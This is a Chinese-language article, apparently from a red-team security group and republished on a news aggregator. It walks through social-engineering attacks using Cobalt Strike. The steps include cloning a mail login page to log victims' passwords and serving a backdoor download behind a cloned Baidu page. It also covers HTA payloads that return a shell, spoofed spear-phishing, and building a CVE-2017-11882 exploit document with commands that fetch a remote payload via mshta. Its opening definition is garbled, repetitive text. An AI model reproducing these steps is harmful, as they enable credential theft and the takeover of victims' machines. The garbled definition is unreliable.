Redian新闻
>
一文了解实战中的社会工程学

一文了解实战中的社会工程学

科技

1、什么是社会工程学


它用于推广用户广泛的恶意活动。使用心理学来来破坏安全或诱骗社会工程诱骗信息。
肇事者首先调查社会目标的信息,以薄薄的背景背景进行攻击,然后进行攻击,然后攻击者攻击行动攻击和攻击行动可能受到攻击伤害。为激发者的信心,并为激发行动的动力,激发实践的动力或为资源提供新的动力。

2、社会工程攻击技术


以下是五种常见的社会工程攻击形式。
1、诱饵
2、恐吓软件
3、借口
4、钓鱼邮件
5、鱼叉式网络钓鱼

3、cobalt strike中的钓鱼


1、信息收集

打开System Profiler

选择跳转www.baidu.com

当通过各种形将http://5.188.33.160:89/链接发送给对方,让对方点击后…跳转到了baidu页面…

可看到选择应用信息后,钓到了客户用的系统以及浏览器版本型号。

2、克隆模块和克隆网站进行键盘记录攻击

这里选择克隆http://mail.sh163.net/ 这里我们还可以申请个相似的域名来进行伪装。

同样需要将连接发送给受害者。
打开Web Log,功能查看被攻击方登录页面的操作情况!

从web log中可以看到受害者输入了账号以及密码

3、克隆网站下载执行木马

打开Host File 克隆一个页面并提供一个后门文件…

file:选择CS生成的shell,或者MSF也行!
确定URL下载的地址端口链接等情况!

生成http://5.188.33.160:898/download/file.exe恶意链接…

然后回到方法2中!!
在打开Clone Site联动克隆模块,将克隆baidu页面,Attack攻击选择恶意链接页面进行钓鱼!

意思就是对方访问http://5.188.33.160:822/页面后会直接下载attack恶意链接后门文件,页面正常跳转到百度页面!

4、HTML Application


这个包生成一个运行负载的 HTML 应用程序;这种攻击需要用户的交互。CobaltStrike生成一个HTML应用hta,该应用中嵌入了一个Payload,通过URL下载这个文件到目标磁盘。运行后目标主机便可以返回会话给CS服务器。

生成

Attack>Packages>HTML Application

针对这个功能CS提供了三种生成方式,分别是 exe、powershell、vba。其中VBA方法需要目标系统上的Microsoft Office,在系统支持的情况下我们一般选择powershell,因为这种方式更加方便后续进行一些免杀的操作。通常结合host File(文件下载功能) 来实行钓鱼。这里以powershell生成hta文件为例。

可以看出就是一个powershell语句

利用

利用CS的文件下载功能来建立一个web服务环境

当有主机访问该URL并进行完用户交互后,便会反弹shell给CS Server

5、Spear Phish


关于Spear phish 和发件人伪造的工具有很多个,比如gophish、SimpleEmailSpoofer、命令行工具swaks等,每个工具都有其特点,当然Cobalt Strike也有此功能。

 Attack>Spear Phish

点击“攻击-邮件钓鱼”

  • • targets是要发送邮箱地址的文件,比如:[email protected] [email protected]

  • • template是要发送邮件的模板,这个可以在个人邮箱中导出一个即可。

  • • attachment放入我们搞好的word

  • • embed url填写搭建好的网站,然后配置好mailserver;SMTP Host: 配置邮件服务器一般都可以在邮件系统中查看;SMTP Port: 设置邮件服务器的端口;username: 邮箱号;Password: 授权码;

  • • bounce to 是模仿发件人,自己填写即可

然后就可以发送钓鱼邮件

6、office宏钓鱼之CVE-2017-11882


关于简单的office钓鱼不再多介绍,请移步

http://wiki.tidesec.com/docs/SocialEngin/SocialEngin-1e17k0fp8s6qq

CVE-2017-11882介绍

CVE-2017-11882属于缓冲区溢出类型漏洞,产生漏洞原因于EQNEDT32.EXE(微软office自带公式编辑器)进程在读入包含MathType的ole数据时,在拷贝公式字体名称(Font Name数据)时没有对名称长度进行校验,导致缓冲区溢出。通过覆盖函数的返回地址,可执行任意代码。

使用

github上Ridter改进过的脚本

https://github.com/Ridter/CVE-2017-11882/

使用该脚本,可以与Attack>Packages>HTML Application功能相结合,生成一个钓鱼文档使目标机上线 方法:

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

或者

python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

配合msf使用:首先要下载一个msf组件:

https://github.com/0x09AL/CVE-2017-11882-metasploit

下载的cve_2017_11882.rb文件复制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目录下

cve_2017_11882.rtf放到/usr/share/metasploit-framework/data/exploits/

重新加载模块、使用命令search cve_2017_11882 查找对应的模块

然后生成相应的payload

use exploit/windows/smb/cve_2017_11882
set lhost ****
set URIPATH test  ## 设置URI的路径(注意这里设置的路径test,下面使用python脚本生成doc的时候也要加上这个路径)
show options

运行

exploit -j

另开一个终端,把Command109b_CVE-2017-11882.py复制到kai liunx桌面,cd到桌面,运行命令

python Command109b_CVE-2017-11882.py -c "mshta http://10.211.55.9:8080/test" -o test2.doc 

生成恶意doc文件

目标机打开即可上线。

往期推荐

敏感信息泄露

潮影在线免杀平台上线了

自动化渗透测试工具开发实践

【红蓝对抗】利用CS进行内网横向

一个Go版(更强大)的TideFinger

SRC资产导航监测平台Tsrc上线了

新潮信息-Tide安全团队2022年度总结

记一次实战攻防(打点-Edr-内网-横向-Vcenter)

E

N

D


知识星球产品及服务

团队内部平台:潮汐在线指纹识别平台 | 潮听漏洞情报平台 | 潮巡资产管理与威胁监测平台 | 潮汐网络空间资产测绘 | 潮声漏洞检测平台 | 在线免杀平台 | CTF练习平台 | 物联网固件检测平台 | SRC资产监控平台  | ......


星球分享方向:Web安全 | 红蓝对抗 | 移动安全 | 应急响应 | 工控安全 | 物联网安全 | 密码学 | 人工智能 | ctf 等方面的沟通及分享


星球知识wiki:红蓝对抗 | 漏洞武器库 | 远控免杀 | 移动安全 | 物联网安全 | 代码审计 | CTF | 工控安全 | 应急响应 | 人工智能 | 密码学 | CobaltStrike | 安全测试用例 | ......


星球网盘资料:安全法律法规 | 安全认证资料 | 代码审计 | 渗透安全工具 | 工控安全工具 | 移动安全工具 | 物联网安全 | 其它安全文库合辑  | ......

扫码加入一起学习吧~

微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
佛罗里达国际大学,享受滨海风情(下)| 心理学博士/社会工作硕博项目介绍报考国家【社会工作者证书】扫码进!高中学历可报!Offer捷报 l Columbia大学社会工作Offer+1!华南师范大学X同学成功申请全美第一社工学院圆藤校梦!《狂飙》:一个不向往高启强的社会,比能清除他的社会更好紧急情况下的LUNA规则你刚进入社会工作时遭遇过什么阿卜杜拉国王科技大学图像视频理解实验室招聘博士后2023兔年春节的大雪一文了解TSV工艺及设备音频品鉴与歌唱评价——音频内容理解实践张艺谋的《满江红》为啥这样红一文了解新加坡GIP投资移民优势!下一代听歌识曲技术探索;银河音效技术实践;歌唱评价与内容理解实践;音乐驱动虚拟人DCF估值模型怎么搭?一文了解DCF模型核心逻辑实务分享|一文了解城投公司发债流程【社会工作者证书】报班培训开启~高中学历可报!开学季低至2折!悉尼这家网红家具店大量备考【社会工作者证书】扫码进!高中学历可报!一文了解二战后日本“右翼”运动脉络——22~23岁末年初出行记8: 蒙特雷湾水族馆一文了解微服务架构的分解设计一文了解,高血压患者如何进行房颤筛查与治疗?用药需谨慎!一文了解各种麻醉药物的过敏反应关于举办2023年浙江大学化学工程与生物工程学院海内外优秀青年学者论坛的通告 |附:《诚邀全球青年人才依托申报优青项目(海外)》一文了解 nostr :马斯克怕到封杀的去中心化社交协议使用注解实现redis分布式锁!一文了解急性心肌炎的诊断与治疗 | 高分综述一文了解,肥胖患者心血管疾病评估和管理挑战 | 高分综述5月15日起,中国出入境政策再优化!8个问答一文了解新政...律师业已达饱和?一文了解各地十四五规划目标一个注解实现 WebSocket 集群方案,这样玩才爽!一文了解网络操作系统,除了Windows、Linux,还有你没听过的!今天起,中国出入境政策再优化!8个问答一文了解新政...使用注解实现redis分布式锁夏威夷大学,享受南太平洋的悠闲 | 心理学/咨询心理学/社会工作/公共健康硕博项目新冠双价疫苗加强针针对XBB/XBB1.5变体有效!
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。